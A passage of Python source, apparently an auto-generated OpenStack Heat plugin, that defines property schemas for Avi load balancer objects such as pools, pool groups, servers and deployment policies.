        'backup_pool': getattr(FailActionBackupPool, 'unique_keys', {}),
        'local_rsp': getattr(FailActionHTTPLocalResponse, 'unique_keys', {}),
    }
class PoolGroupDeploymentPolicy(AviResource):
    """Heat resource for the Avi 'poolgroupdeploymentpolicy' object.

    Controls how new pools in a pool group are promoted to production
    (blue/green or canary), including the evaluation rules and traffic
    ratios used during rollout.
    """
    resource_name = "poolgroupdeploymentpolicy"
    # all schemas
    avi_version_schema = properties.Schema(
        properties.Schema.STRING,
        _("Avi Version to use for the object. Default is 16.4.2. If you plan to use any fields introduced after 16.4.2, then this needs to be explicitly set."),
        required=False,
        update_allowed=True,
    )
    name_schema = properties.Schema(
        properties.Schema.STRING,
        _("The name of the pool group deployment policy"),
        required=True,
        update_allowed=True,
    )
    scheme_schema = properties.Schema(
        properties.Schema.STRING,
        _("deployment scheme (Default: BLUE_GREEN)"),
        required=False,
        update_allowed=True,
        constraints=[
            constraints.AllowedValues(['BLUE_GREEN', 'CANARY']),
        ],
    )
    test_traffic_ratio_rampup_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Ratio of the traffic that is sent to the pool under test. test ratio of 100 means blue green (Default: 100)"),
        required=False,
        update_allowed=True,
    )
    # Element schema for entries of the 'rules' list below.
    rules_item_schema = properties.Schema(
        properties.Schema.MAP,
        _(""),
        schema=PGDeploymentRule.properties_schema,
        required=True,
        update_allowed=False,
    )
    rules_schema = properties.Schema(
        properties.Schema.LIST,
        _(""),
        schema=rules_item_schema,
        required=False,
        update_allowed=True,
    )
    webhook_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("(Introduced in: 17.1.1) Webhook configured with URL that Avi controller will pass back information about pool group, old and new pool information and current deployment rule results"),
        required=False,
        update_allowed=True,
    )
    evaluation_duration_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Duration of evaluation period for automatic deployment (Units: SEC) (Default: 300)"),
        required=False,
        update_allowed=True,
    )
    target_test_traffic_ratio_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Target traffic ratio before pool is made production (Units: RATIO) (Default: 100)"),
        required=False,
        update_allowed=True,
    )
    auto_disable_old_prod_pools_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("It will automatically disable old production pools once there is a new production candidate (Default: True)"),
        required=False,
        update_allowed=True,
    )
    description_schema = properties.Schema(
        properties.Schema.STRING,
        _(""),
        required=False,
        update_allowed=True,
    )
    # properties list
    PROPERTIES = (
        'avi_version',
        'name',
        'scheme',
        'test_traffic_ratio_rampup',
        'rules',
        'webhook_uuid',
        'evaluation_duration',
        'target_test_traffic_ratio',
        'auto_disable_old_prod_pools',
        'description',
    )
    # mapping of properties to their schemas
    properties_schema = {
        'avi_version': avi_version_schema,
        'name': name_schema,
        'scheme': scheme_schema,
        'test_traffic_ratio_rampup': test_traffic_ratio_rampup_schema,
        'rules': rules_schema,
        'webhook_uuid': webhook_uuid_schema,
        'evaluation_duration': evaluation_duration_schema,
        'target_test_traffic_ratio': target_test_traffic_ratio_schema,
        'auto_disable_old_prod_pools': auto_disable_old_prod_pools_schema,
        'description': description_schema,
    }
    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'rules': getattr(PGDeploymentRule, 'field_references', {}),
    }
    # uniqueness keys inherited from the nested sub-object schemas
    unique_keys = {
        'rules': getattr(PGDeploymentRule, 'unique_keys', {}),
    }
class NetworkFilter(object):
    """Schema container for the NetworkFilter Avi object."""

    # Schema for the network UUID (or name reference).
    network_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _(" You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        update_allowed=True,
        required=True,
    )
    # Schema for the server filter expression.
    server_filter_schema = properties.Schema(
        properties.Schema.STRING,
        _(""),
        update_allowed=True,
        required=False,
    )

    # Ordered tuple of property names exposed by this object.
    PROPERTIES = ('network_uuid', 'server_filter')

    # Property name -> schema mapping consumed by Heat.
    properties_schema = {
        'network_uuid': network_uuid_schema,
        'server_filter': server_filter_schema,
    }

    # Maps 'network_uuid' to the Avi object type 'vimgrnwruntime' so that
    # get_avi_uuid_by_name lookups can be resolved.
    field_references = {
        'network_uuid': 'vimgrnwruntime',
    }
class HTTPReselectRespCode(object):
    """Schema container for the HTTPReselectRespCode Avi object.

    Matches server HTTP response codes — as individual codes, ranges, or
    coarse blocks (4xx/5xx) — that trigger server reselect.
    """
    # all schemas
    # Element schema for entries of the 'codes' list below.
    codes_item_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("HTTP response code to be matched."),
        required=True,
        update_allowed=False,
    )
    codes_schema = properties.Schema(
        properties.Schema.LIST,
        _("HTTP response code to be matched."),
        schema=codes_item_schema,
        required=False,
        update_allowed=True,
    )
    # Element schema for entries of the 'ranges' list below.
    ranges_item_schema = properties.Schema(
        properties.Schema.MAP,
        _("HTTP response code ranges to match."),
        schema=HTTPStatusRange.properties_schema,
        required=True,
        update_allowed=False,
    )
    ranges_schema = properties.Schema(
        properties.Schema.LIST,
        _("HTTP response code ranges to match."),
        schema=ranges_item_schema,
        required=False,
        update_allowed=True,
    )
    # Element schema for entries of the 'resp_code_block' list below.
    resp_code_block_item_schema = properties.Schema(
        properties.Schema.STRING,
        _("Block of HTTP response codes to match for server reselect."),
        required=True,
        update_allowed=False,
        constraints=[
            constraints.AllowedValues(['HTTP_RSP_4XX', 'HTTP_RSP_5XX']),
        ],
    )
    resp_code_block_schema = properties.Schema(
        properties.Schema.LIST,
        _("Block of HTTP response codes to match for server reselect."),
        schema=resp_code_block_item_schema,
        required=False,
        update_allowed=True,
    )
    # properties list
    PROPERTIES = (
        'codes',
        'ranges',
        'resp_code_block',
    )
    # mapping of properties to their schemas
    properties_schema = {
        'codes': codes_schema,
        'ranges': ranges_schema,
        'resp_code_block': resp_code_block_schema,
    }
    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'ranges': getattr(HTTPStatusRange, 'field_references', {}),
    }
    # uniqueness keys inherited from the nested sub-object schemas
    unique_keys = {
        'ranges': getattr(HTTPStatusRange, 'unique_keys', {}),
    }
class PoolGroup(AviResource):
    """Heat resource for the Avi 'poolgroup' object.

    A pool group is a collection of pool members with optional priority
    labels, a deployment policy, and a fail action applied when the group
    experiences a failure.
    """
    resource_name = "poolgroup"
    # all schemas
    avi_version_schema = properties.Schema(
        properties.Schema.STRING,
        _("Avi Version to use for the object. Default is 16.4.2. If you plan to use any fields introduced after 16.4.2, then this needs to be explicitly set."),
        required=False,
        update_allowed=True,
    )
    name_schema = properties.Schema(
        properties.Schema.STRING,
        _("The name of the pool group."),
        required=True,
        update_allowed=True,
    )
    # Element schema for entries of the 'members' list below.
    members_item_schema = properties.Schema(
        properties.Schema.MAP,
        _("List of pool group members object of type PoolGroupMember."),
        schema=PoolGroupMember.properties_schema,
        required=True,
        update_allowed=False,
    )
    members_schema = properties.Schema(
        properties.Schema.LIST,
        _("List of pool group members object of type PoolGroupMember."),
        schema=members_item_schema,
        required=False,
        update_allowed=True,
    )
    priority_labels_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("UUID of the priority labels. If not provided, pool group member priority label will be interpreted as a number with a larger number considered higher priority. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=True,
    )
    min_servers_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("The minimum number of servers to distribute traffic to. (Default: 0)"),
        required=False,
        update_allowed=True,
    )
    deployment_policy_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("When setup autoscale manager will automatically promote new pools into production when deployment goals are met."),
        required=False,
        update_allowed=True,
    )
    fail_action_schema = properties.Schema(
        properties.Schema.MAP,
        _("Enable an action - Close Connection, HTTP Redirect, or Local HTTP Response - when a pool group failure happens. By default, a connection will be closed, in case the pool group experiences a failure."),
        schema=FailAction.properties_schema,
        required=False,
        update_allowed=True,
    )
    implicit_priority_labels_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("(Introduced in: 17.1.9,17.2.3) Whether an implicit set of priority labels is generated. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    created_by_schema = properties.Schema(
        properties.Schema.STRING,
        _("Name of the user who created the object."),
        required=False,
        update_allowed=True,
    )
    cloud_config_cksum_schema = properties.Schema(
        properties.Schema.STRING,
        _("Checksum of cloud configuration for PoolGroup. Internally set by cloud connector"),
        required=False,
        update_allowed=True,
    )
    description_schema = properties.Schema(
        properties.Schema.STRING,
        _("Description of Pool Group."),
        required=False,
        update_allowed=True,
    )
    cloud_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _(""),
        required=False,
        update_allowed=False,
    )
    # properties list
    PROPERTIES = (
        'avi_version',
        'name',
        'members',
        'priority_labels_uuid',
        'min_servers',
        'deployment_policy_uuid',
        'fail_action',
        'implicit_priority_labels',
        'created_by',
        'cloud_config_cksum',
        'description',
        'cloud_uuid',
    )
    # mapping of properties to their schemas
    properties_schema = {
        'avi_version': avi_version_schema,
        'name': name_schema,
        'members': members_schema,
        'priority_labels_uuid': priority_labels_uuid_schema,
        'min_servers': min_servers_schema,
        'deployment_policy_uuid': deployment_policy_uuid_schema,
        'fail_action': fail_action_schema,
        'implicit_priority_labels': implicit_priority_labels_schema,
        'created_by': created_by_schema,
        'cloud_config_cksum': cloud_config_cksum_schema,
        'description': description_schema,
        'cloud_uuid': cloud_uuid_schema,
    }
    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'priority_labels_uuid': 'prioritylabels',
        'fail_action': getattr(FailAction, 'field_references', {}),
        'members': getattr(PoolGroupMember, 'field_references', {}),
    }
    # uniqueness keys inherited from the nested sub-object schemas
    unique_keys = {
        'fail_action': getattr(FailAction, 'unique_keys', {}),
        'members': getattr(PoolGroupMember, 'unique_keys', {}),
    }
class HTTPServerReselect(object):
    """Schema container for the HTTPServerReselect Avi object.

    Configures retrying an HTTP request on another server when the
    current server responds with configured status codes.
    """
    # all schemas
    enabled_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Enable HTTP request reselect when server responds with specific response codes. (Default: False)"),
        required=True,
        update_allowed=True,
    )
    svr_resp_code_schema = properties.Schema(
        properties.Schema.MAP,
        _("Server response codes which will trigger an HTTP request retry."),
        schema=HTTPReselectRespCode.properties_schema,
        required=False,
        update_allowed=True,
    )
    num_retries_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Number of times to retry an HTTP request when server responds with configured status codes. (Default: 4)"),
        required=False,
        update_allowed=True,
    )
    retry_nonidempotent_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Allow retry of non-idempotent HTTP requests. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    # properties list
    PROPERTIES = (
        'enabled',
        'svr_resp_code',
        'num_retries',
        'retry_nonidempotent',
    )
    # mapping of properties to their schemas
    properties_schema = {
        'enabled': enabled_schema,
        'svr_resp_code': svr_resp_code_schema,
        'num_retries': num_retries_schema,
        'retry_nonidempotent': retry_nonidempotent_schema,
    }
    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'svr_resp_code': getattr(HTTPReselectRespCode, 'field_references', {}),
    }
    # uniqueness keys inherited from the nested sub-object schemas
    unique_keys = {
        'svr_resp_code': getattr(HTTPReselectRespCode, 'unique_keys', {}),
    }
class Server(object):
    """Schema container for the Server Avi object.

    Describes a single back-end server in a pool: its address/hostname,
    port, weighting ratio, plus a number of internal-use and deprecated
    discovery fields populated by the Avi controller.
    """
    # all schemas
    ip_schema = properties.Schema(
        properties.Schema.MAP,
        _("IP Address of the server. Required if there is no resolvable host name."),
        schema=IpAddr.properties_schema,
        required=True,
        update_allowed=True,
    )
    port_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Optionally specify the servers port number. This will override the pool's default server port attribute."),
        required=False,
        update_allowed=True,
    )
    hostname_schema = properties.Schema(
        properties.Schema.STRING,
        _("DNS resolvable name of the server. May be used in place of the IP address."),
        required=False,
        update_allowed=True,
    )
    enabled_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Enable, Disable or Graceful Disable determine if new or existing connections to the server are allowed. (Default: True)"),
        required=False,
        update_allowed=True,
    )
    ratio_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Ratio of selecting eligible servers in the pool (Default: 1)"),
        required=False,
        update_allowed=True,
    )
    vm_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("(internal-use) This field is used internally by Avi, not editable by the user. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=True,
    )
    nw_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("(internal-use) This field is used internally by Avi, not editable by the user. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=True,
    )
    # Element schema for entries of the 'discovered_network_uuid' list below.
    discovered_network_uuid_item_schema = properties.Schema(
        properties.Schema.STRING,
        _("(Deprecated in: 17.1.1) (internal-use) Discovered network for this server. This field is deprecated."),
        required=True,
        update_allowed=False,
    )
    discovered_network_uuid_schema = properties.Schema(
        properties.Schema.LIST,
        _("(Deprecated in: 17.1.1) (internal-use) Discovered network for this server. This field is deprecated. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        schema=discovered_network_uuid_item_schema,
        required=False,
        update_allowed=True,
    )
    external_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("UUID identifying VM in OpenStack and other external compute"),
        required=False,
        update_allowed=True,
    )
    # Element schema for entries of the 'discovered_subnet' list below.
    discovered_subnet_item_schema = properties.Schema(
        properties.Schema.MAP,
        _("(Deprecated in: 17.1.1) (internal-use) Discovered subnet for this server. This field is deprecated."),
        schema=IpAddrPrefix.properties_schema,
        required=True,
        update_allowed=False,
    )
    discovered_subnet_schema = properties.Schema(
        properties.Schema.LIST,
        _("(Deprecated in: 17.1.1) (internal-use) Discovered subnet for this server. This field is deprecated."),
        schema=discovered_subnet_item_schema,
        required=False,
        update_allowed=True,
    )
    verify_network_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Verify server belongs to a discovered network or reachable via a discovered network. Verify reachable network isn't the OpenStack management network (Default: False)"),
        required=False,
        update_allowed=True,
    )
    # Element schema for entries of the 'discovered_networks' list below.
    discovered_networks_item_schema = properties.Schema(
        properties.Schema.MAP,
        _("(internal-use) Discovered networks providing reachability for server IP. This field is used internally by Avi, not editable by the user."),
        schema=DiscoveredNetwork.properties_schema,
        required=True,
        update_allowed=False,
    )
    discovered_networks_schema = properties.Schema(
        properties.Schema.LIST,
        _("(internal-use) Discovered networks providing reachability for server IP. This field is used internally by Avi, not editable by the user."),
        schema=discovered_networks_item_schema,
        required=False,
        update_allowed=True,
    )
    resolve_server_by_dns_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Auto resolve server's IP using DNS name (Default: False)"),
        required=False,
        update_allowed=True,
    )
    prst_hdr_val_schema = properties.Schema(
        properties.Schema.STRING,
        _("Header value for custom header persistence. "),
        required=False,
        update_allowed=True,
    )
    mac_address_schema = properties.Schema(
        properties.Schema.STRING,
        _("MAC address of server."),
        required=False,
        update_allowed=True,
    )
    static_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("If statically learned. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    server_node_schema = properties.Schema(
        properties.Schema.STRING,
        _("Hostname of the node where the server VM or container resides"),
        required=False,
        update_allowed=True,
    )
    availability_zone_schema = properties.Schema(
        properties.Schema.STRING,
        _("Availability-zone of the server VM."),
        required=False,
        update_allowed=True,
    )
    rewrite_host_header_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Rewrite incoming Host Header to server name. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    external_orchestration_id_schema = properties.Schema(
        properties.Schema.STRING,
        _("UID of server in external orchestration systems"),
        required=False,
        update_allowed=True,
    )
    description_schema = properties.Schema(
        properties.Schema.STRING,
        _("A description of the Server."),
        required=False,
        update_allowed=True,
    )
    location_schema = properties.Schema(
        properties.Schema.MAP,
        _("(Introduced in: 17.1.1) (internal-use) Geographic location of the server.Currently only for internal usage."),
        schema=GeoLocation.properties_schema,
        required=False,
        update_allowed=False,
    )
    autoscaling_group_name_schema = properties.Schema(
        properties.Schema.STRING,
        _("(Introduced in: 17.1.2) Name of autoscaling group this server belongs to."),
        required=False,
        update_allowed=False,
    )
    # properties list
    PROPERTIES = (
        'ip',
        'port',
        'hostname',
        'enabled',
        'ratio',
        'vm_uuid',
        'nw_uuid',
        'discovered_network_uuid',
        'external_uuid',
        'discovered_subnet',
        'verify_network',
        'discovered_networks',
        'resolve_server_by_dns',
        'prst_hdr_val',
        'mac_address',
        'static',
        'server_node',
        'availability_zone',
        'rewrite_host_header',
        'external_orchestration_id',
        'description',
        'location',
        'autoscaling_group_name',
    )
    # mapping of properties to their schemas
    properties_schema = {
        'ip': ip_schema,
        'port': port_schema,
        'hostname': hostname_schema,
        'enabled': enabled_schema,
        'ratio': ratio_schema,
        'vm_uuid': vm_uuid_schema,
        'nw_uuid': nw_uuid_schema,
        'discovered_network_uuid': discovered_network_uuid_schema,
        'external_uuid': external_uuid_schema,
        'discovered_subnet': discovered_subnet_schema,
        'verify_network': verify_network_schema,
        'discovered_networks': discovered_networks_schema,
        'resolve_server_by_dns': resolve_server_by_dns_schema,
        'prst_hdr_val': prst_hdr_val_schema,
        'mac_address': mac_address_schema,
        'static': static_schema,
        'server_node': server_node_schema,
        'availability_zone': availability_zone_schema,
        'rewrite_host_header': rewrite_host_header_schema,
        'external_orchestration_id': external_orchestration_id_schema,
        'description': description_schema,
        'location': location_schema,
        'autoscaling_group_name': autoscaling_group_name_schema,
    }
    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'ip': getattr(IpAddr, 'field_references', {}),
        'discovered_networks': getattr(DiscoveredNetwork, 'field_references', {}),
        'discovered_subnet': getattr(IpAddrPrefix, 'field_references', {}),
        'vm_uuid': 'vimgrvmruntime',
        'location': getattr(GeoLocation, 'field_references', {}),
        'discovered_network_uuid': 'network',
        'nw_uuid': 'vimgrnwruntime',
    }
    # NOTE(review): 'my_key' appears to declare that servers are unique by
    # (ip, port), mirroring other generated classes — confirm with generator.
    unique_keys = {
        'ip': getattr(IpAddr, 'unique_keys', {}),
        'discovered_networks': getattr(DiscoveredNetwork, 'unique_keys', {}),
        'my_key': 'ip,port',
        'location': getattr(GeoLocation, 'unique_keys', {}),
        'discovered_subnet': getattr(IpAddrPrefix, 'unique_keys', {}),
    }
class Pool(AviResource):
    """Heat resource wrapping the Avi Vantage "pool" API object.

    Declares one ``properties.Schema`` per Avi pool field, then wires them
    together in ``PROPERTIES`` / ``properties_schema``.  The layout is
    formulaic and appears auto-generated from the Avi API schema — TODO
    confirm before hand-editing individual schemas.

    ``field_references`` maps property names to Avi object types (or to the
    nested resource's own references) to support name-to-UUID resolution
    ('get_avi_uuid_by_name:' prefix); ``unique_keys`` mirrors the nested
    resources' uniqueness metadata.
    """
    resource_name = "pool"
    # all schemas
    avi_version_schema = properties.Schema(
        properties.Schema.STRING,
        _("Avi Version to use for the object. Default is 16.4.2. If you plan to use any fields introduced after 16.4.2, then this needs to be explicitly set."),
        required=False,
        update_allowed=True,
    )
    name_schema = properties.Schema(
        properties.Schema.STRING,
        _("The name of the pool."),
        required=True,
        update_allowed=True,
    )
    default_server_port_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Traffic sent to servers will use this destination server port unless overridden by the server's specific port attribute. The SSL checkbox enables Avi to server encryption. (Default: 80)"),
        required=False,
        update_allowed=True,
    )
    graceful_disable_timeout_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Used to gracefully disable a server. Virtual service waits for the specified time before terminating the existing connections to the servers that are disabled. (Units: MIN) (Default: 1)"),
        required=False,
        update_allowed=True,
    )
    connection_ramp_duration_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Duration for which new connections will be gradually ramped up to a server recently brought online. Useful for LB algorithms that are least connection based. (Units: MIN) (Default: 10)"),
        required=False,
        update_allowed=True,
    )
    max_concurrent_connections_per_server_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("The maximum number of concurrent connections allowed to each server within the pool. NOTE: applied value will be no less than the number of service engines that the pool is placed on. If set to 0, no limit is applied. (Default: 0)"),
        required=False,
        update_allowed=True,
    )
    # LIST-typed properties are declared as an *_item_schema (element) plus
    # the list schema that wraps it.
    health_monitor_uuids_item_schema = properties.Schema(
        properties.Schema.STRING,
        _("Verify server health by applying one or more health monitors. Active monitors generate synthetic traffic from each Service Engine and mark a server up or down based on the response. The Passive monitor listens only to client to server communication. It raises or lowers the ratio of traffic destined to a server based on successful responses."),
        required=True,
        update_allowed=False,
    )
    health_monitor_uuids_schema = properties.Schema(
        properties.Schema.LIST,
        _("Verify server health by applying one or more health monitors. Active monitors generate synthetic traffic from each Service Engine and mark a server up or down based on the response. The Passive monitor listens only to client to server communication. It raises or lowers the ratio of traffic destined to a server based on successful responses. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        schema=health_monitor_uuids_item_schema,
        required=False,
        update_allowed=True,
    )
    servers_item_schema = properties.Schema(
        properties.Schema.MAP,
        _("The pool directs load balanced traffic to this list of destination servers. The servers can be configured by IP address, name, network or via IP Address Group"),
        schema=Server.properties_schema,
        required=True,
        update_allowed=False,
    )
    servers_schema = properties.Schema(
        properties.Schema.LIST,
        _("The pool directs load balanced traffic to this list of destination servers. The servers can be configured by IP address, name, network or via IP Address Group"),
        schema=servers_item_schema,
        required=False,
        update_allowed=True,
    )
    server_count_schema = properties.Schema(
        properties.Schema.NUMBER,
        _(" (Default: 0)"),
        required=False,
        update_allowed=True,
    )
    lb_algorithm_schema = properties.Schema(
        properties.Schema.STRING,
        _("The load balancing algorithm will pick a server within the pool's list of available servers. (Default: LB_ALGORITHM_LEAST_CONNECTIONS)"),
        required=False,
        update_allowed=True,
        constraints=[
            constraints.AllowedValues(['LB_ALGORITHM_CONSISTENT_HASH', 'LB_ALGORITHM_CORE_AFFINITY', 'LB_ALGORITHM_FASTEST_RESPONSE', 'LB_ALGORITHM_FEWEST_SERVERS', 'LB_ALGORITHM_FEWEST_TASKS', 'LB_ALGORITHM_LEAST_CONNECTIONS', 'LB_ALGORITHM_LEAST_LOAD', 'LB_ALGORITHM_NEAREST_SERVER', 'LB_ALGORITHM_RANDOM', 'LB_ALGORITHM_ROUND_ROBIN']),
        ],
    )
    lb_algorithm_hash_schema = properties.Schema(
        properties.Schema.STRING,
        _("Criteria used as a key for determining the hash between the client and server. (Default: LB_ALGORITHM_CONSISTENT_HASH_SOURCE_IP_ADDRESS)"),
        required=False,
        update_allowed=True,
        constraints=[
            constraints.AllowedValues(['LB_ALGORITHM_CONSISTENT_HASH_CALLID', 'LB_ALGORITHM_CONSISTENT_HASH_CUSTOM_HEADER', 'LB_ALGORITHM_CONSISTENT_HASH_CUSTOM_STRING', 'LB_ALGORITHM_CONSISTENT_HASH_SOURCE_IP_ADDRESS', 'LB_ALGORITHM_CONSISTENT_HASH_SOURCE_IP_ADDRESS_AND_PORT', 'LB_ALGORITHM_CONSISTENT_HASH_URI']),
        ],
    )
    lb_algorithm_consistent_hash_hdr_schema = properties.Schema(
        properties.Schema.STRING,
        _("HTTP header name to be used for the hash key."),
        required=False,
        update_allowed=True,
    )
    networks_item_schema = properties.Schema(
        properties.Schema.MAP,
        _("(internal-use) Networks designated as containing servers for this pool. The servers may be further narrowed down by a filter. This field is used internally by Avi, not editable by the user."),
        schema=NetworkFilter.properties_schema,
        required=True,
        update_allowed=False,
    )
    networks_schema = properties.Schema(
        properties.Schema.LIST,
        _("(internal-use) Networks designated as containing servers for this pool. The servers may be further narrowed down by a filter. This field is used internally by Avi, not editable by the user."),
        schema=networks_item_schema,
        required=False,
        update_allowed=True,
    )
    placement_networks_item_schema = properties.Schema(
        properties.Schema.MAP,
        _("Manually select the networks and subnets used to provide reachability to the pool's servers. Specify the Subnet using the following syntax: 10-1-1-0/24. Use static routes in VRF configuration when pool servers are not directly connected butroutable from the service engine."),
        schema=PlacementNetwork.properties_schema,
        required=True,
        update_allowed=False,
    )
    placement_networks_schema = properties.Schema(
        properties.Schema.LIST,
        _("Manually select the networks and subnets used to provide reachability to the pool's servers. Specify the Subnet using the following syntax: 10-1-1-0/24. Use static routes in VRF configuration when pool servers are not directly connected butroutable from the service engine."),
        schema=placement_networks_item_schema,
        required=False,
        update_allowed=True,
    )
    application_persistence_profile_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("Persistence will ensure the same user sticks to the same server for a desired duration of time. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=True,
    )
    ssl_profile_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("When enabled, Avi re-encrypts traffic to the backend servers. The specific SSL profile defines which ciphers and SSL versions will be supported. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=True,
    )
    inline_health_monitor_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("The Passive monitor will monitor client to server connections and requests and adjust traffic load to servers based on successful responses. This may alter the expected behavior of the LB method, such as Round Robin. (Default: True)"),
        required=False,
        update_allowed=True,
    )
    use_service_port_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Do not translate the client's destination port when sending the connection to the server. The pool or servers specified service port will still be used for health monitoring. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    fail_action_schema = properties.Schema(
        properties.Schema.MAP,
        _("Enable an action - Close Connection, HTTP Redirect or Local HTTP Response - when a pool failure happens. By default, a connection will be closed, in case the pool experiences a failure."),
        schema=FailAction.properties_schema,
        required=False,
        update_allowed=True,
    )
    capacity_estimation_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Inline estimation of capacity of servers. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    capacity_estimation_ttfb_thresh_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("The maximum time-to-first-byte of a server. (Units: MILLISECONDS) (Default: 0)"),
        required=False,
        update_allowed=True,
    )
    pki_profile_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("Avi will validate the SSL certificate present by a server against the selected PKI Profile. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=True,
    )
    ssl_key_and_certificate_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("Service Engines will present a client SSL certificate to the server. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=True,
    )
    server_auto_scale_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Server AutoScale. Not used anymore. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    prst_hdr_name_schema = properties.Schema(
        properties.Schema.STRING,
        _("Header name for custom header persistence"),
        required=False,
        update_allowed=True,
    )
    apic_epg_name_schema = properties.Schema(
        properties.Schema.STRING,
        _("Synchronize Cisco APIC EPG members with pool servers"),
        required=False,
        update_allowed=True,
    )
    autoscale_networks_item_schema = properties.Schema(
        properties.Schema.STRING,
        _("Network Ids for the launch configuration"),
        required=True,
        update_allowed=False,
    )
    autoscale_networks_schema = properties.Schema(
        properties.Schema.LIST,
        _("Network Ids for the launch configuration"),
        schema=autoscale_networks_item_schema,
        required=False,
        update_allowed=True,
    )
    autoscale_policy_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("Reference to Server Autoscale Policy You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=True,
    )
    autoscale_launch_config_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("If configured then Avi will trigger orchestration of pool server creation and deletion. It is only supported for container clouds like Mesos, Opensift, Kubernates, Docker etc. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=True,
    )
    vrf_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("Virtual Routing Context that the pool is bound to. This is used to provide the isolation of the set of networks the pool is attached to. The pool inherits the Virtual Routing Conext of the Virtual Service, and this field is used only internally, and is set by pb-transform. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=False,
    )
    ipaddrgroup_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("Use list of servers from Ip Address Group You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
        required=False,
        update_allowed=True,
    )
    fewest_tasks_feedback_delay_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Periodicity of feedback for fewest tasks server selection algorithm. (Units: SEC) (Default: 10)"),
        required=False,
        update_allowed=True,
    )
    enabled_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Enable or disable the pool. Disabling will terminate all open connections and pause health monitors. (Default: True)"),
        required=False,
        update_allowed=True,
    )
    max_conn_rate_per_server_schema = properties.Schema(
        properties.Schema.MAP,
        _("Rate Limit connections to each server."),
        schema=RateProfile.properties_schema,
        required=False,
        update_allowed=True,
    )
    east_west_schema = properties.Schema(
